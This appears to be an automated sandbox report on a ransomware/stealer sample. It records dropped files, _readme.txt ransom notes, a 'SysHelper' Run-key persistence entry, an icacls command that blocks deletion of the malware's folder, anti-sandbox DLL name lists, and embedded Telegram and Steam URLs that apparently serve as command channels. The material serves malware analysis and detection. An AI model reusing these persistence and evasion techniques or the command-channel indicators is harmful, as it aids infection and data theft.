                Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error3.txt source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2232512939.0000000003C32000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\0 source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2321203058.0000000003CA7000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2282081320.0000000003CA8000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2282440855.0000000003CA8000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2320687899.0000000003CA4000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2313914869.0000000003CA8000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2324655611.0000000003CAC000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\t\ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2321203058.0000000003CA7000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2320687899.0000000003CA4000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2313914869.0000000003CA8000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2324655611.0000000003CAC000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2316130649.0000000003CCD000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\f source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2282529154.00000000036A1000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2311222602.00000000036A1000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2294187046.0000000003EE3000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2284034690.0000000003F2D000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2292702111.0000000003EE2000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\d source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2255239356.0000000003B10000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2232801684.0000000003B10000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2255319462.0000000003B1B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2232512939.0000000003C32000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2292648224.0000000003C65000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2341825344.0000000003C86000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2273490567.0000000003C47000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2315115698.0000000003C5C000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2254663516.0000000003C5D000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2320687899.0000000003C5C000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2310618606.0000000003C56000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2313914869.0000000003C5C000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2332695677.0000000003C7B000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2292043905.0000000003C56000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2360091492.0000000003C8E000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2282440855.0000000003C7B000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2273727258.0000000003C73000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2323157191.0000000003C87000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2316085239.0000000003C6D000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2316719842.0000000003C79000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196da
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\les\j source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2341959833.0000000003B24000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2348441168.0000000003B2B000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2342176452.0000000003B27000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\%; source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2332585421.0000000004035000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ngs\ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2321203058.0000000003CA7000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2320687899.0000000003CA4000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2313914869.0000000003CA8000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2324655611.0000000003CAC000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2316130649.0000000003CCD000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\* source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2323506783.0000000003F3B000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2323100107.0000000003F23000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2314739889.0000000003F03000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2322324444.0000000003EE2000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2319577426.0000000003ECB000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\\PS source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2321203058.0000000003CA7000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2320687899.0000000003CA4000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2313914869.0000000003CA8000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2324655611.0000000003CAC000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2316130649.0000000003CCD000.00000004.00000020.00020000.00000000.sdmp
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeUnpacked PE file: 5.2.build2.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.tls:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                Detected unpacking (overwrites its own PE header)
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeUnpacked PE file: 5.2.build2.exe.400000.0.unpack
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00BA2220 GetCommandLineW,CommandLineToArgvW,PathFindFileNameW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,K32EnumProcesses,OpenProcess,K32EnumProcessModules,K32GetModuleBaseNameW,CloseHandle,0_2_00BA2220
                Source: sqlite3[1].dll.5.drStatic PE information: section name: /4
                Source: sqlite3[1].dll.5.drStatic PE information: section name: /19
                Source: sqlite3[1].dll.5.drStatic PE information: section name: /31
                Source: sqlite3[1].dll.5.drStatic PE information: section name: /45
                Source: sqlite3[1].dll.5.drStatic PE information: section name: /57
                Source: sqlite3[1].dll.5.drStatic PE information: section name: /70
                Source: sqlite3[1].dll.5.drStatic PE information: section name: /81
                Source: sqlite3[1].dll.5.drStatic PE information: section name: /92
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00BB8565 push ecx; ret 0_2_00BB8578
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_00308565 push ecx; ret 2_2_00308578
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_00319598 push esi; ret 2_2_0031959C
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_003195C2 push edi; ret 2_2_003195C8
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_003196FD pushfd ; retn 003Ah2_2_003196FE
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_00319729 pushfd ; retn 003Ah2_2_0031972A
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_0031974E pushfd ; retn 003Ah2_2_0031974F
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_00319A87 push edi; ret 2_2_00319A8B
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_00319BAC push esi; ret 2_2_00319BB0
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00BB8565 push ecx; ret 3_2_00BB8578
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 4_2_00402854 push ecx; ret 4_2_00402867
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 4_2_00403FF1 push ecx; ret 4_2_00404004
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 4_2_005D616F push esi; ret 4_2_005D6171
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 4_2_005D0E05 push ecx; ret 4_2_005D0E18
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 4_2_005DCFE5 push 3BFFFFFFh; retf 4_2_005DCFEA
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 4_2_00637859 push ecx; ret 4_2_0063785A
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 4_2_00638A27 push ebp; retf 4_2_00638A28
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 4_2_00635E7A push ecx; ret 4_2_00635E80
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_00420465 push ecx; ret 5_2_00420478
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_004257CF push esi; ret 5_2_004257D1
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61EDA2A8 push ds; retf 5_2_61EDA2AE
                Source: initial sampleStatic PE information: section name: .text entropy: 7.652702953960109
                Source: initial sampleStatic PE information: section name: .text entropy: 7.652702953960109

                Persistence and Installation Behavior

                barindex
                Infects executable files (exe, dll, sys, html)
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeSystem file written: C:\Users\user\AppData\Local\Temp\chrome.exeJump to behavior
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\Users\user\AppData\Local\Temp\wctF86A.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\sqlite3[1].dllJump to dropped file
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeJump to dropped file
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\Users\user\AppData\Local\Temp\tmp3BC7.tmpJump to dropped file
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\Users\user\Local Settings\Temp\wct3D66.tmp.cdqw (copy)Jump to dropped file
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeJump to dropped file
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\Users\user\Local Settings\Temp\wctF86A.tmp.cdqw (copy)Jump to dropped file
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\build2[1].exeJump to dropped file
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\Users\user\Local Settings\Temp\tmp3BC7.tmp.cdqw (copy)Jump to dropped file
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\Users\user\AppData\Local\Temp\wct3D66.tmpJump to dropped file
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\_readme.txtJump to behavior
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\$WinREAgent\_readme.txtJump to behavior
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\$WinREAgent\Scratch\_readme.txtJump to behavior
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\Users\user\_readme.txtJump to behavior
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysHelperJump to behavior
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysHelperJump to behavior
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00C11920 GetVersionExA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,0_2_00C11920
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: build2.exe PID: 7772, type: MEMORYSTR
                Found stalling execution ending in API Sleep call
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeStalling execution: Execution stalls by calling Sleepgraph_3-41451
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeStalling execution: Execution stalls by calling Sleepgraph_2-42184
                Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                Source: build2.exeBinary or memory string: DIR_WATCH.DLL
                Source: build2.exeBinary or memory string: SBIEDLL.DLL
                Source: build2.exeBinary or memory string: API_LOG.DLL
                Source: build2.exe, 00000005.00000002.2903117606.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: @CMDVRT64.DLLCMDVRT32.DLLWPESPY.DLLVMCHECK.DLLPSTOREC.DLLDIR_WATCH.DLLAPI_LOG.DLLSBIEDLL.DLLSNXHK.DLLAVGHOOKA.DLLAVGHOOKX.DLL...\*.*\7.32B42C548F42FDA81B4A288299BD7F129HTTPS://T.ME/BG3GOTYMEDVSMOZILLA/5.0 (X11; UBUNTU; LINUX X86_64; RV:109.0) GECKO/20100101 FIREFOX/112.0 UACQHTTPS://STEAMCOMMUNITY.COM/PROFILES/76561199601319247HELLOWFQY12O5J6NR.$V
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00B91193 rdtsc 0_2_00B91193
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_00361920 GetVersionExA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,NetStatisticsGet,NetStatisticsGet,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateToolhelp32Snapshot,GetTickCount,Heap32ListFirst,Heap32First,Heap32Next,GetTickCount,Heap32ListNext,GetTickCount,GetTickCount,GetTickCount,Process32First,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,2_2_00361920
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free,0_2_00B9E670
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free,2_2_002EE670
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free,3_2_00B9E670
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeThread delayed: delay time: 700000Jump to behavior
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wctF86A.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\sqlite3[1].dllJump to dropped file
